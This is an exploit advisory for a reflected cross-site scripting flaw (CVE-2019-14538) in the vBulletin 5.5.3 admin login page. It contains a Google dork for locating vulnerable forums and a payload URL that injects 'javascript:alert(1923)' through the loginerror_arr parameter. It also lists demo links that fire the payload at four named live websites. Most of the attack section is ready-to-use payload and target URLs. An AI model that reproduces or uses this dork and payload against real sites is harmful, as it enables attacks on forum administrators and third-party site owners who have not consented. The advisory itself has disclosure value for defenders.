-->

vBulletin Reflected XSS via "Click here"

vBulletin Reflected XSS
# Exploit Title: vBulletin Reflected XSS via "Click here"
# Google Dork: intext : "Powered by vBulletin® Version 5.5.3 Copyright © 2019 MH Sub I, LLC dba vBulletin"
# Date: 05/08/2019
# Exploit Author: TrazeR
# Vendor Homepage: https://www.vbulletin.com/
# Software Link: https://www.vbulletin.com/download.php
# Version: vBulletin 5.5.3
# Tested on: Windows 10
# CVE : CVE-2019-14538


#################################################################################

Dork: intext : "Powered by vBulletin® Version 5.5.3 Copyright © 2019 MH Sub I, LLC dba vBulletin"

vBulletin 5.5.3 Reflected XSS via "Click here"

Payload:

/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

(Click here!) click here xss will work

Demo :

https://forum.vbulletin.com/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

https://www.scootersoftware.com/vbulletin//admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

https://www.photorials.nl/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

https://powerhacker.net/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

screenshot:


#################################################################################

> [Reference]
> https://hackerone.com/trazer
> https://www.trazer.org/
> https://www.cyber-warrior.org/194929/
> https://cxsecurity.com/author/TrazeR/1/